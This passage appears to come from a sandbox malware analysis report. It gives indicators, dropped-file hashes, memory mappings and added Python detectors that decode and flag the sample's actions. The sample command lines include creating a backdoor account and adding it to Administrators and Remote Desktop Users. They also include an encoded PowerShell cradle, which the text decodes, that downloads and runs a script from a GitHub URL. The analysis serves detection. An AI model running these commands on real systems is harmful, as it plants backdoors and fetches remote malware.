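    "aQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMA"
    "cQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA"
)
SAMPLE_CMDLINES = [
    "net.exe user WgaUtilAcc qOgyLOeJ /add",
    'net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD',
    'net.exe LOCALGROUP "Remote Desktop Users" MHKKHUYI$ /ADD',
    'net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD',
    "net.exe user WgaUtilAcc qOgyLOeJ",
    "wmic path win32_VideoController get name",
    "wmic CPU get NAME",
    "powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc " + ENC_BLOB,
]

NET_EXES = {"net", "net.exe", "net1", "net1.exe"}
PRIVILEGED_GROUPS = {"administrators", "remote desktop users"}


def tokenize(cmdline):
    """Split a Windows command line on whitespace, keeping "quoted strings" as one token."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def decode_encoded_command(cmdline):
    """Return the plaintext behind a PowerShell -EncodedCommand switch, or None.

    powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -en, -enc, ...)
    plus the -ec alias, and the payload is base64 over UTF-16LE, not UTF-8.
    """
    toks = tokenize(cmdline)
    for i, tok in enumerate(toks[:-1]):
        low = tok.lower().replace("/", "-", 1)
        if low == "-ec" or (len(low) >= 2 and "-encodedcommand".startswith(low)):
            try:
                raw = base64.b64decode(toks[i + 1], validate=True)
            except ValueError:  # binascii.Error is a ValueError subclass
                return None
            return raw.decode("utf-16-le", errors="replace")
    return None


def analyze(cmdlines):
    """Run the rules over the command lines in order; returns (rule, subject, evidence) tuples.

    Account creation is remembered so that a later group addition of the *same* account
    scores as a backdoor, while a lone "net localgroup" call is only a privileged-group add.
    """
    findings, created = [], set()
    for cmd in cmdlines:
        toks = tokenize(cmd)
        if not toks:
            continue
        exe = toks[0].lower().rsplit("\\", 1)[-1]
        args = [t.lower() for t in toks[1:]]
        joined = " ".join(args)
        if exe in NET_EXES and len(args) >= 2:
            verb, target = args[0], args[1]
            if verb == "user" and "/add" in args:
                created.add(target)
                findings.append(("local_account_created", target, cmd))
            elif verb == "user" and len(args) >= 3 and target in created and not args[2].startswith("/"):
                findings.append(("password_set_on_new_account", target, cmd))
            elif verb == "localgroup" and len(args) >= 3 and "/add" in args and target in PRIVILEGED_GROUPS:
                member = args[2]
                if member in created:
                    rule = "new_account_added_to_" + ("admins" if target == "administrators" else "rdp_users")
                else:
                    rule = "privileged_group_add"
                findings.append((rule, member, cmd))
        elif exe in ("wmic", "wmic.exe") and ("videocontroller" in joined or "cpu get" in joined):
            findings.append(("hardware_fingerprint_via_wmic", joined, cmd))
        elif exe.startswith("powershell"):
            decoded = decode_encoded_command(cmd)
            if decoded and re.search(r"\b(iex|invoke-expression)\b", decoded, re.I) \
                    and re.search(r"downloadstring|downloadfile|webclient|invoke-webrequest", decoded, re.I):
                urls = re.findall(r"https?://[^\s\"')]+", decoded)
                findings.append(("encoded_download_cradle", urls[0] if urls else "", decoded))
    return findings


if __name__ == "__main__":
    for rule, subject, evidence in analyze(SAMPLE_CMDLINES):
        print(f"{rule:32} {subject}")
```

Run against the eight lines above, the decoder yields `IEX (New-Object Net.Webclient).downloadstring("https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1")`, which is the URL the Malware Config section already extracted, and the analyzer reports the WgaUtilAcc account as created, added to the RDP group, added to Administrators and re-passworded, the machine account MHKKHUYI$ as a plain privileged-group add, both wmic queries as fingerprinting, and the cradle with its URL. The point of keeping `created` across lines is that `net localgroup` on its own is routine administration; the same call a few hundred milliseconds after `net user ... /add` from a non-interactive parent is not.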
Network
MITRE ATT&CK Matrix (ATT&CK v6)
Downloads
- C:\Users\Admin\AppData\Local\Temp\2556.exe
  MD5 77ce7ab11225c5e723b7b1be0308e8c0
  SHA1 709a8df1d49f28cf8c293694bbbbd0f07735829b
  SHA256 d407b5c7d9568448f1e7387924fe4dded9e016632879c386c307ef5dcf63f496
  SHA512 f73582206397db625bdefbbaf8abdc1a820ae8054eb2ef2a3ed18c8e00e8365c7ad81013b33990e4304619b3834a1b8b15c782905204add158fca686e2c25c3b
- C:\Users\Admin\AppData\Local\Temp\2B53.exe
  MD5 3ba1d635fed88d8af279be91b7007bae
  SHA1 62a1d59c746cdb51e699114f410749384a70cf73
  SHA256 3151b115c3370d5360286bfe3a053d0d543f0e5d21faa68fee167224e68d115a
  SHA512 83254fb484bd40740e5e0483dcc7fd8ce612033b00238494fdcdc5a5dcb3503195e0e2694edd5d848c07e2ddc61cafdb7d331afc4792ccd788837ebbce18bfeb
- C:\Users\Admin\AppData\Local\Temp\3372.exe
  MD5 f80418f12c03a56ac2e8d8b189c13750
  SHA1 cd0b728375e4e178b50bca8ad65ce79aede30d37
  SHA256 cbc5d7db8e27b2369a1d83c2d8615c1dbb6263e8b80c4b12a86493c9df093716
  SHA512 e3fb85cc08a94193528ecc760b58904df47aa302419267c5b3386468e1d7fdece63fee05d8d95a083637b70a24035d3123c94463111ba372b39fcc69787aa196
- C:\Users\Admin\AppData\Local\Temp\40F0.exe
  MD5 fd4e0205ce36f99ff343a78ec3e251bc
  SHA1 b633df31339acb69f708a41fd227298420fd4036
  SHA256 617f9d822418a44cac50b28755f2d075fac1c2de21995820912f07f4b4ee8075
  SHA512 f413a054603bc0bc86d1657e3960c4b691e7900be36e9470a408264cb63ad0eb9d7cea7b83dbfdf7f727ea5c359d7d6ab5b565ab60976735d67f00c5a082f50e
- C:\Users\Admin\AppData\Local\Temp\5BCC.exe
  MD5 5dec7029dda901f99d02a1cb08d6b3ab
  SHA1 8561c81e8fab7889eb13ab29450bed82878e78c9
  SHA256 6a61b992773f571c45f2d1087a56817dd5c1f3a90ca2965cc5c7319b33f3890b
  SHA512 09e5856113a7b073568e878d1de74c834e318dd05b95afe8729a3008b4cc1efc0b1a6a9c21b25c0b1dadec3d6de5b5bc4ef84523f454591717b6f24fe5dffaca
- C:\Users\Admin\AppData\Local\Temp\RES8818.tmp
  MD5 d2a72aa9256b7d29c36e9b6104a463bb
  SHA1 ad9f38948f0813f921db83ed6aed2dc5358431e1
  SHA256 5c494c453cf9ecc068a26771e376fb4b012592046eedba67b1681a2d7e28c363
  SHA512 badde297a02b050c3ba1ecd455716eda2c86c07e5bef25b54c898a08cbe87f56a762e6278d00647a10a19afdbe56f49665c60b2f785bf1bd29c92360b7956b34
- C:\Users\Admin\AppData\Local\Temp\RES9084.tmp
  MD5 c6363291e00109b7499524ba9f840618
  SHA1 c84aee07f8127e5305b307b5ff4562c922e66b45
  SHA256 cb6d19b67bbbdfd31a9a4e44dfd9ed8f7a379a962ebe93a17c2c0f438e27f233
  SHA512 67e0b497c3e05c39d829c9493dbff69942e5aaea273268373031f5594ad4f7bf0b01e6805206654333244d92332bec4668c626ffea3d0911fc4f660a0ec4ade1
- C:\Users\Admin\AppData\Local\Temp\bdrv1q4i\bdrv1q4i.dll
  MD5 e96fd91ba2ddf7f52899ee1b6967df57
  SHA1 6f2c29791fdaba092a40c0e23c766aa6893e96c6
  SHA256 f7587e403e415c5b15b950c786b7993f34f6c40a3f23cd897182a0e2159151b8
  SHA512 53d2451b965b55c44d000624869a42b2dad1ff3c91df247255977b73149e38588fc81cf9332cddc09f3ba6ca8eaca625fb122f391e4c992b0d41d82ee6884136
- C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1
  MD5 854b2dfc0a28f2959b1d2fc363a4e318
  SHA1 ce1753052c5bdad56708ec75d8085b2c597df6c1
  SHA256 7135370ad5c4279486173fa5d0de73ea06dd814e4f8df98f80624f6f8b8c231c
  SHA512 b0204091d6f89877c808c2c1db97c3723f063eace68d54b25da674b5971d0a2f7d60549923097c36dedc8c1cb2f77dfdd1dfb4df60f16682652a6755e287bfd6
- C:\Users\Admin\AppData\Local\Temp\hlytvvhu\hlytvvhu.dll
  MD5 3f4488d20d9150f62f956cae3371c0e7
  SHA1 14b7e3e1b1b1bb3b441d7a31d92cf33548527174
  SHA256 db658965583b0af5fc88890c8f5da2007c3861ca178b4309624319354086f4bf
  SHA512 6c7c97b519bed7be2a1d1d02226427afde6c144c813967c83a0de778df5109ea41642465851eaf721cf10a44bef0ece485c7a8b8cb7aa9a3f3f64f2c4bd8c40b
- C:\Users\Admin\AppData\Local\Temp\ready.ps1
  MD5 28d9755addec05c0b24cca50dfe3a92b
  SHA1 7d3156f11c7a7fb60d29809caf93101de2681aa3
  SHA256 abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
  SHA512 891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42
- C:\Users\Admin\AppData\Roaming\auuewje
  MD5 a7b8bb9f2aaf5c1a07af5fdfabb2a1f4
  SHA1 e5d892d8c416d2768f12e7f45c8588a0c98f5987
  SHA256 74e0750c52b67b6b099f46086e04d2a130d95dd42a8739289abc0395862e3e2b
  SHA512 041a14d3f3cc4d4264b5a151330c7022606d715888c3b30bc169010475e9171e1fa37c96181255e8d32fd6065a90a64f5a8df693fe3a5a0c9f92bd83998511f9
- \??\c:\Users\Admin\AppData\Local\Temp\bdrv1q4i\CSC274793B17BA34147AA1A9E992D21413.TMP
  MD5 1a307ec9434b6cdb615a8c44d95830bb
  SHA1 c6ba1319d5d4a3aea012ebecb4e01eda7f48b6c2
  SHA256 883b74d855f854d12e7f1b1b2722ac97b1a37fd5a7369b562d5f829403415477
  SHA512 3b15f278bd92627137b43bf906f43b22b2ccf68445adbde5a43b215c94a360783bde90a0cd73b5641539b47dd3e826c05362cff0565b138bc7b9093125246556
- \??\c:\Users\Admin\AppData\Local\Temp\bdrv1q4i\bdrv1q4i.0.cs
  MD5 e0f116150ceec4ea8bb954d973e3b649
  SHA1 86a8e81c70f4cc265f13e8760cf8888a6996f0fd
  SHA256 511ea5f70cbc2f5d875f7dd035cb5203b119e22c3b131cc551d21d151c909d54
  SHA512 32f01c2658c0314709e5dedec9a6d9911d0a0d777f6856569e043f705d036ab10e996732303ecdffea912e783b79463bdc0ffaa4b8c9d7a1e06a9073cd263bec
- \??\c:\Users\Admin\AppData\Local\Temp\bdrv1q4i\bdrv1q4i.cmdline
  MD5 9066e90e7b07733bf2b90fafa3e6dc20
  SHA1 ca67ba3056a9785cb69fbd5463322d05b96203ff
  SHA256 6e4aec9ad1ee1a184ae9ba07c6071d8e7b6211c49bc623ed0f91d3e1f629fbf7
  SHA512 bb70e9ffc605aefee61c70f5dedc46ba62e1b0d3f314c0e85158ec0dd7131c2bf5464f00cd5ecd5427e0a7a1727869b4b49550b899e672c06cc858a1dffb4407
- \??\c:\Users\Admin\AppData\Local\Temp\hlytvvhu\CSCD325231E0BC419885828D16AAB4B2A2.TMP
  MD5 5a84705cde9b68063345354a07d684ae
  SHA1 072fd6ad42784ebaddaa9b568f12d416d4210282
  SHA256 9a79ff3e759f4207a73ca508a55e0ed26e69afccaccedc0e42cd46b60d712b36
  SHA512 af5197a561bb2f1853999f70706cf099dbf7ec0dfdd89bd7d8da149cc4441388911671936aca458d9094ce40dda3779d247c00a9255d21306b4217d8c0f95351
- \??\c:\Users\Admin\AppData\Local\Temp\hlytvvhu\hlytvvhu.0.cs
  MD5 9f8ab7eb0ab21443a2fe06dab341510e
  SHA1 2b88b3116a79e48bab7114e18c9b9674e8a52165
  SHA256 e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
  SHA512 53f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b
- \??\c:\Users\Admin\AppData\Local\Temp\hlytvvhu\hlytvvhu.cmdline
  MD5 8175c2982e5f3bf67becc746d024496c
  SHA1 f3ff01147ae565290b308d4f4429fe64051af01b
  SHA256 3025961100b3ee59e454aae52be5f76ed145ebe1c4e599fcbedafd6cc19158eb
  SHA512 e10bc60315161abc0d9bfe112964f6bb12af7eab40bf43c392b526db41d83bc6921178ef492b08dbed02fdb1898ce0eac655726d45a59fbf46575888e24f2439
- \Windows\Branding\mediasrv.png
  MD5 83bd2c45f1faf20a77579cbb8765c2b3
  SHA1 fe01b295c1005f4cbc0cfcb277dac5e7c443622c
  SHA256 ca7ce804ab35bf65eb6f6e1501afbd506520bbe9bd04710d5efe0e57377a9809
  SHA512 e0ac8e2d79841e18fedfed993d6e0bedb169a2ca57092292ac831667dedddbca8b90619f977d449d9595adbb9efd48487940fced5eaa38ef17366ec7075da57c
- \Windows\Branding\mediasvc.png
  MD5 af4e893deae35128088534aea49a1b74
  SHA1 ce25e8e738978a2106e3464a7a4bf0345e60fd31
  SHA256 76dd1fb220473c4167a73d7202943fda2109da475e515f4056a03bb01318f22d
  SHA512 3115d385ec08548337b28b6b4f773578e9548d418b30f1f276f6a835a203ef497f0d23a7282f2fc7aceda73099eb4c4535c17c4842b542bd1867320f07319b97
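Two things in the dropped-file list deserve a second look rather than a scroll past: several entries are the same file reported more than once, and `C:\Users\Admin\AppData\Roaming\auuewje` carries exactly the MD5/SHA1/SHA256/SHA512 of the submitted sample, i.e. the loader copied itself into the roaming profile under a random name for persistence. The following added example (not part of the report or of any tool it mentions) parses the listing in the flattened form the export produces, collapses the repeats, and flags any dropped file whose SHA256 equals the sample's. The four entries it is fed are copied from the list above; the SHA512 lines are left out of the sample input only for brevity, the parser accepts them.

```python
import re

# SHA256 of the submitted sample, from the General section of this report.
SAMPLE_SHA256 = "74e0750c52b67b6b099f46086e04d2a130d95dd42a8739289abc0395862e3e2b"

# Constructed sample input: four entries copied from the dropped-file listing above
# in the flattened form the export produces (first label fused onto the path, one
# entry repeated verbatim, SHA512 lines omitted to keep the sample short).
SAMPLE_LISTING = """\
-
C:\\Users\\Admin\\AppData\\Local\\Temp\\2556.exeMD5
77ce7ab11225c5e723b7b1be0308e8c0
SHA1709a8df1d49f28cf8c293694bbbbd0f07735829b
SHA256d407b5c7d9568448f1e7387924fe4dded9e016632879c386c307ef5dcf63f496
-
C:\\Users\\Admin\\AppData\\Local\\Temp\\2556.exeMD5
77ce7ab11225c5e723b7b1be0308e8c0
SHA1709a8df1d49f28cf8c293694bbbbd0f07735829b
SHA256d407b5c7d9568448f1e7387924fe4dded9e016632879c386c307ef5dcf63f496
-
C:\\Users\\Admin\\AppData\\Roaming\\auuewjeMD5
a7b8bb9f2aaf5c1a07af5fdfabb2a1f4
SHA1e5d892d8c416d2768f12e7f45c8588a0c98f5987
SHA25674e0750c52b67b6b099f46086e04d2a130d95dd42a8739289abc0395862e3e2b
-
\\Windows\\Branding\\mediasrv.pngMD5
83bd2c45f1faf20a77579cbb8765c2b3
SHA1fe01b295c1005f4cbc0cfcb277dac5e7c443622c
SHA256ca7ce804ab35bf65eb6f6e1501afbd506520bbe9bd04710d5efe0e57377a9809
"""

# A hash line is an optional algorithm label followed by a hex digest; the algorithm
# is recovered from the digest length, so fused, separated or missing labels all parse.
HASH_LINE = re.compile(r"^(?:MD5|SHA1|SHA256|SHA512)?\s*([0-9a-f]{32,128})$", re.I)
HASH_KIND = {32: "md5", 40: "sha1", 64: "sha256", 128: "sha512"}


def parse_dropped_files(text):
    """Parse the listing into one dict per entry: {"path": ..., "md5": ..., "sha1": ..., ...}."""
    entries, current = [], None
    for line in text.splitlines():
        line = line.strip()
        if not line or line == "-":        # "-" separates entries in the export
            current = None
            continue
        m = HASH_LINE.match(line)
        if m and current is not None:
            digest = m.group(1).lower()
            kind = HASH_KIND.get(len(digest))
            if kind:
                current[kind] = digest
            continue
        # Anything else starts a new entry; the export fuses the "MD5" label onto the path.
        current = {"path": re.sub(r"MD5$", "", line)}
        entries.append(current)
    return entries


def dedupe_by_sha256(entries):
    """Collapse repeated rows onto one record per SHA256, keeping every distinct path seen."""
    by_hash = {}
    for e in entries:
        h = e.get("sha256")
        if not h:
            continue
        rec = by_hash.setdefault(h, {**e, "paths": []})
        if e["path"] not in rec["paths"]:
            rec["paths"].append(e["path"])
    return list(by_hash.values())


def copies_of_sample(entries, sample_sha256=SAMPLE_SHA256):
    """Dropped files whose SHA256 equals the submitted sample: the loader's copies of itself."""
    return sorted({e["path"] for e in entries if e.get("sha256") == sample_sha256.lower()})


if __name__ == "__main__":
    rows = parse_dropped_files(SAMPLE_LISTING)
    print(f"{len(rows)} rows, {len(dedupe_by_sha256(rows))} unique files")
    print("self-copies of the sample:", copies_of_sample(rows))
```

Keying on SHA256 rather than on path is deliberate: the same payload is often written to several paths (a `%TEMP%\XXXX.exe` stage and its persistence copy), and one SHA256 is what you hand to the blocklist. Matching the self-copy against the sample hash is also the quickest way to tell a loader's persistence artifact apart from a genuinely new second-stage file such as 2B53.exe.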
- memory/8-487-0x0000000000000000-mapping.dmp
- memory/356-423-0x0000000000000000-mapping.dmp
- memory/392-476-0x0000000000000000-mapping.dmp
- memory/704-490-0x0000000000000000-mapping.dmp
- memory/808-132-0x0000000004EA0000-0x0000000004EA1000-memory.dmp  Filesize 4KB
- memory/808-173-0x0000000005050000-0x0000000005051000-memory.dmp  Filesize 4KB
- memory/808-146-0x000000006FC50000-0x000000006FC9B000-memory.dmp  Filesize 300KB
- memory/808-135-0x0000000074A50000-0x0000000075D98000-memory.dmp  Filesize 19.3MB
- memory/808-122-0x0000000000C60000-0x0000000000CC8000-memory.dmp  Filesize 416KB
- memory/808-125-0x0000000073A80000-0x0000000073C42000-memory.dmp  Filesize 1.8MB
- memory/808-123-0x00000000006B0000-0x00000000006B1000-memory.dmp  Filesize 4KB
- memory/808-136-0x0000000004E90000-0x0000000004E91000-memory.dmp  Filesize 4KB
- memory/808-134-0x0000000073C60000-0x00000000741E4000-memory.dmp  Filesize 5.5MB
- memory/808-133-0x0000000004D20000-0x0000000004D21000-memory.dmp  Filesize 4KB
- memory/808-145-0x0000000004D60000-0x0000000004D61000-memory.dmp  Filesize 4KB
- memory/808-119-0x0000000000000000-mapping.dmp
- memory/808-126-0x0000000076CD0000-0x0000000076DC1000-memory.dmp  Filesize 964KB
- memory/808-124-0x0000000002260000-0x00000000022A5000-memory.dmp  Filesize 276KB
- memory/808-131-0x0000000004CC0000-0x0000000004CC1000-memory.dmp  Filesize 4KB
- memory/808-127-0x0000000000C60000-0x0000000000C61000-memory.dmp  Filesize 4KB
- memory/808-129-0x0000000071AA0000-0x0000000071B20000-memory.dmp  Filesize 512KB
- memory/808-130-0x00000000054B0000-0x00000000054B1000-memory.dmp  Filesize 4KB
- memory/808-183-0x00000000068D0000-0x00000000068D1000-memory.dmp  Filesize 4KB
- memory/808-184-0x0000000006FD0000-0x0000000006FD1000-memory.dmp  Filesize 4KB
- memory/1064-282-0x00000224818C3000-0x00000224818C5000-memory.dmp  Filesize 8KB
- memory/1064-303-0x00000224818C6000-0x00000224818C8000-memory.dmp  Filesize 8KB
- memory/1064-269-0x0000000000000000-mapping.dmp
- memory/1064-323-0x00000224818C8000-0x00000224818CA000-memory.dmp  Filesize 8KB
- memory/1064-281-0x00000224818C0000-0x00000224818C2000-memory.dmp  Filesize 8KB
- memory/1156-477-0x0000000000000000-mapping.dmp
- memory/1300-406-0x000001E4FD6D8000-0x000001E4FD6DA000-memory.dmp  Filesize 8KB
- memory/1300-404-0x000001E4FD6D3000-0x000001E4FD6D5000-memory.dmp  Filesize 8KB
- memory/1300-405-0x000001E4FD6D6000-0x000001E4FD6D8000-memory.dmp  Filesize 8KB
- memory/1300-403-0x000001E4FD6D0000-0x000001E4FD6D2000-memory.dmp  Filesize 8KB
- memory/1300-359-0x0000000000000000-mapping.dmp
- memory/1308-170-0x0000000000000000-mapping.dmp
- memory/1308-194-0x0000000002EB0000-0x0000000002EB6000-memory.dmp  Filesize 24KB
- memory/1308-199-0x0000000000400000-0x0000000002B74000-memory.dmp  Filesize 39.5MB
- memory/1308-195-0x0000000002EC0000-0x0000000002EC5000-memory.dmp  Filesize 20KB
- memory/1320-478-0x0000000000000000-mapping.dmp
- memory/1352-424-0x0000000000000000-mapping.dmp
- memory/1476-480-0x0000000000000000-mapping.dmp
- memory/1504-486-0x0000000000000000-mapping.dmp
- memory/1564-485-0x0000000000000000-mapping.dmp
- memory/1684-472-0x0000000000000000-mapping.dmp
- memory/1724-164-0x0000000073C60000-0x00000000741E4000-memory.dmp  Filesize 5.5MB
- memory/1724-150-0x0000000000000000-mapping.dmp
- memory/1724-153-0x0000000000AC0000-0x0000000000B2C000-memory.dmp  Filesize 432KB
- memory/1724-154-0x00000000005E0000-0x00000000005E1000-memory.dmp  Filesize 4KB
- memory/1724-155-0x0000000073A80000-0x0000000073C42000-memory.dmp  Filesize 1.8MB
- memory/1724-156-0x0000000076CD0000-0x0000000076DC1000-memory.dmp  Filesize 964KB
- memory/1724-157-0x0000000000AC0000-0x0000000000AC1000-memory.dmp  Filesize 4KB
- memory/1724-159-0x0000000071AA0000-0x0000000071B20000-memory.dmp  Filesize 512KB
- memory/1724-166-0x0000000000CC0000-0x0000000000D05000-memory.dmp  Filesize 276KB
- memory/1724-165-0x0000000074A50000-0x0000000075D98000-memory.dmp  Filesize 19.3MB
- memory/1724-167-0x00000000050A0000-0x00000000050A1000-memory.dmp  Filesize 4KB
- memory/1724-169-0x000000006FC50000-0x000000006FC9B000-memory.dmp  Filesize 300KB
- memory/1736-586-0x0000000000000000-mapping.dmp
- memory/1736-248-0x0000000000000000-mapping.dmp
- memory/1752-491-0x0000000000000000-mapping.dmp
- memory/1752-509-0x000001EE70370000-0x000001EE70372000-memory.dmp  Filesize 8KB
- memory/1752-510-0x000001EE70373000-0x000001EE70375000-memory.dmp  Filesize 8KB
- memory/1752-511-0x000001EE70376000-0x000001EE70378000-memory.dmp  Filesize 8KB
- memory/1752-521-0x000001EE70378000-0x000001EE70379000-memory.dmp  Filesize 4KB
- memory/1868-482-0x0000000000000000-mapping.dmp
- memory/2108-267-0x000001BCAFB08000-0x000001BCAFB09000-memory.dmp  Filesize 4KB
- memory/2108-215-0x000001BC97470000-0x000001BC97472000-memory.dmp  Filesize 8KB
- memory/2108-212-0x0000000000000000-mapping.dmp
- memory/2108-216-0x000001BC97470000-0x000001BC97472000-memory.dmp  Filesize 8KB
- memory/2108-233-0x000001BCAFB06000-0x000001BCAFB08000-memory.dmp  Filesize 8KB
- memory/2108-225-0x000001BCAFB03000-0x000001BCAFB05000-memory.dmp  Filesize 8KB
- memory/2108-224-0x000001BCAFB00000-0x000001BCAFB02000-memory.dmp  Filesize 8KB
- memory/2108-213-0x000001BC97470000-0x000001BC97472000-memory.dmp  Filesize 8KB
- memory/2108-214-0x000001BC97470000-0x000001BC97472000-memory.dmp  Filesize 8KB
- memory/2368-236-0x0000000000400000-0x00000000004CC000-memory.dmp  Filesize 816KB
- memory/2472-468-0x0000000000000000-mapping.dmp
- memory/2700-585-0x0000000000000000-mapping.dmp
- memory/2708-462-0x0000000000000000-mapping.dmp
- memory/2820-245-0x0000000000000000-mapping.dmp
- memory/2980-203-0x000002206ED80000-0x000002206F04F000-memory.dmp  Filesize 2.8MB
- memory/2980-207-0x000002206CA95000-0x000002206CA96000-memory.dmp  Filesize 4KB
- memory/2980-206-0x000002206CA93000-0x000002206CA95000-memory.dmp  Filesize 8KB
- memory/2980-200-0x0000000000000000-mapping.dmp
- memory/2980-208-0x000002206CA96000-0x000002206CA97000-memory.dmp  Filesize 4KB
- memory/2980-205-0x000002206CA90000-0x000002206CA92000-memory.dmp  Filesize 8KB
- memory/2996-362-0x000001842DD38000-0x000001842DD3A000-memory.dmp  Filesize 8KB
- memory/2996-324-0x000001842DD30000-0x000001842DD32000-memory.dmp  Filesize 8KB
- memory/2996-325-0x000001842DD33000-0x000001842DD35000-memory.dmp  Filesize 8KB
- memory/2996-313-0x0000000000000000-mapping.dmp
- memory/2996-360-0x000001842DD36000-0x000001842DD38000-memory.dmp  Filesize 8KB
- memory/3040-118-0x00000000009B0000-0x00000000009C6000-memory.dmp  Filesize 88KB
- memory/3040-266-0x00000000045E0000-0x00000000045F6000-memory.dmp  Filesize 88KB
- memory/3160-422-0x0000000000000000-mapping.dmp
- memory/3232-467-0x0000000000000000-mapping.dmp
- memory/3312-483-0x0000000000000000-mapping.dmp
- memory/3388-484-0x0000000000000000-mapping.dmp
- memory/3504-117-0x0000000000400000-0x00000000004CC000-memory.dmp  Filesize 816KB
- memory/3504-116-0x0000000000030000-0x0000000000039000-memory.dmp  Filesize 36KB
- memory/3608-470-0x0000000000000000-mapping.dmp
- memory/3612-469-0x0000000000000000-mapping.dmp
- memory/3704-466-0x0000000000000000-mapping.dmp
- memory/3704-239-0x0000000000000000-mapping.dmp
- memory/3844-488-0x0000000000000000-mapping.dmp
- memory/3844-461-0x0000000000000000-mapping.dmp
- memory/3848-235-0x0000000000000000-mapping.dmp
- memory/3848-471-0x0000000000000000-mapping.dmp
- memory/3852-479-0x0000000000000000-mapping.dmp
- memory/3868-481-0x0000000000000000-mapping.dmp
- memory/3960-211-0x0000000000400000-0x0000000002B74000-memory.dmp  Filesize 39.5MB
- memory/3960-209-0x0000000002B80000-0x0000000002CCA000-memory.dmp  Filesize 1.3MB
- memory/3960-210-0x0000000002B80000-0x0000000002CCA000-memory.dmp  Filesize 1.3MB
- memory/3972-473-0x0000000000000000-mapping.dmp
- memory/3976-137-0x0000000000000000-mapping.dmp
- memory/3976-140-0x0000000000470000-0x0000000000471000-memory.dmp  Filesize 4KB
- memory/3976-149-0x0000000004C70000-0x0000000005276000-memory.dmp  Filesize 6.0MB
- memory/3976-174-0x0000000005030000-0x0000000005031000-memory.dmp  Filesize 4KB
- memory/3976-175-0x0000000005150000-0x0000000005151000-memory.dmp  Filesize 4KB
- memory/3976-176-0x0000000005D90000-0x0000000005D91000-memory.dmp  Filesize 4KB
- memory/3976-177-0x0000000005130000-0x0000000005131000-memory.dmp  Filesize 4KB
- memory/3996-489-0x0000000000000000-mapping.dmp